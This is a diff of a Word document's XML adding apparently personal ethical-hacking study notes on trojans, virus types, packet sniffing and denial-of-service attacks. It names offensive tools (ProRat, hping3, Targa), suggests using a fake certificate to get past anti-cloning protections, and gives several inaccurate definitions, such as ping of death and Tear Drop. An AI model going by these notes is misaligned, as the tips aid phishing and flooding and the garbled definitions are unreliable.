--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -16,7 +16,6 @@
         <w:lock w:val="contentLocked"/>
         <w:group/>
       </w:sdtPr>
-      <w:sdtEndPr/>
       <w:sdtContent>
         <w:sdt>
           <w:sdtPr>
@@ -28,7 +27,6 @@
             <w:dataBinding w:xpath="/ns0:BlogPostInfo/ns0:PostTitle" w:storeItemID="{5F329CAD-B019-4FA6-9FEF-74898909AD20}"/>
             <w:text/>
           </w:sdtPr>
-          <w:sdtEndPr/>
           <w:sdtContent>
             <w:p>
               <w:pPr>
@@ -9944,6 +9942,742 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t xml:space="preserve">There is a possibility </w:t>
+      </w:r>
+      <w:r>
+        <w:t>that few of the site have tools that block the cloning of websites. To get around this we need to use certificate(obviously a fake one) to bluff.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>There are many other social engineering attacks and tools available. The above ones are just only for reference and to understand how these work.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Trojans:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>This is a piece of software that enters the system and opens a backdoor for the attacker to gain access.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Types of Trojans:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Wrappers or Binders: these actually have the original software and work naturally.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Rootkit: Trojan with elevated privileges.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>http Trojan: Through https and http.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Key logger: Records all the key strokes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Netcat: Not a Trojan but acts like a Trojan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Virus Life Cycle:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5486400" cy="3200400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="16" name="Diagram 16"/>
+            <wp:cNvGraphicFramePr/>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/diagram">
+                <dgm:relIds xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:dm="rId123" r:lo="rId124" r:qs="rId125" r:cs="rId126"/>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Types of Virus:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Boot virus: The virus that corrupts the boot or messes with it. 001 Sector contains the boot.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Macro virus: The virus infects through macros in excel sheets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Polymorhicuiws: This encrypts itself. Basically this encrypts the programs again and again so that it does not work anymore.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Cavity Virus: Empties a space on memory leaving a void. This deletes randomly some part of the memory leading to loss of files and programs stop working .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Network virus: Through network the virus spreads.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Stealth Virus: Executes itself and sends information to the attacker.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Tunnelling virus: modifies original program.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Sniffing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Sensing a sample to find out the characteristics or properties of something.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. It is a form of “tapping phone wires” and get to know about the conversation. It is also called </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>wiretapping</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> applied to the computer networks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>One can sniff the following sensitive information from a network −</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Email traffic</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>FTP passwords</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Web traffics</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Telnet passwords</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Router configuration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Chat sessions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DNS traffic</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Obviously there is so much to learn in everything so take a look at the tutorials point website: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId128" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.tutorialspoint.com/ethical_hacking/ethical_hacking_sniffing.htm</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tools :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>There are a wide variety of tools that can be used but here are few that are most useful or mostly useful:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>SMAC: used for changing the MAC address of a system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Prorat: It’s a RAT{Remote access Trojan}. Used for getting a remote access to a target system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Denial of service</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">By this attack the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>attacker’s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> main aim is to stop your server from responding to actual </w:t>
+      </w:r>
+      <w:r>
+        <w:t>request from the users. So this will cause a damage to your business. Ex-Suppose if you’re a online ecommerce site. The attacker can send a huge amount of requests to your server overwhelming it so that it can’t respond to any of the actual request from your users. This will obviously cause a damage to your business.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Basic understanding of DOS attacks- We have already seen the typical three way handshake over the net. Assume the same situation, what if a person sends huge amounts of SYN packets to the server instead of one. This principle is how the DOS attack works</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now we have different types of DOS based on this principle-</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">DDOS attack: This is a kind of DOS attack that totally hides the attackers and the attack. In normal DOS attack only one attacker will be there. It is same in the DDOS attack but the attacker pretends to be many people and sends the packets. This causes a difficulty for the </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">server managers to point the attackers but still they can stop the attack by limiting the number of packets from each IP. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Smurf: It spoofs the traffic and sends it through the broadcast.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Fraggle: Same as smurf but instead TCP it sends only UDP packets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>PIngOfDeath: The TCP packet can be a maximum of 64 kilobyte. Packet size larger 64k are sent, this is called ping of death.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Tear Drop: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>A type of virus that changes the offset causing overlapping during reassembly resulting in corruptions or loss of packets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>SYN flood: we have seen the basic DOS attack. It is named as syn flood attack. In this the handshake never actually occurs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>LAND flood : Similar to SYN flood , instead of SYN packets we use ACK packets. We can say here that actually the server started the handshake.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>BOT NET: This is automated virus. This simply reflects itself and attacks all the victims that are vulnerable and opens the backdoor to the attacker.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tools:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Hping3 is used in kali to flood the victim.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>There are other tools in windows which does the same task –</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Targa</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> h</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ping </w:t>
+      </w:r>
+      <w:r>
+        <w:t>and crazypinger etc.</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
@@ -10049,6 +10783,268 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="091774DB"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="868417F2"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0F2B2316"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="670A5272"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
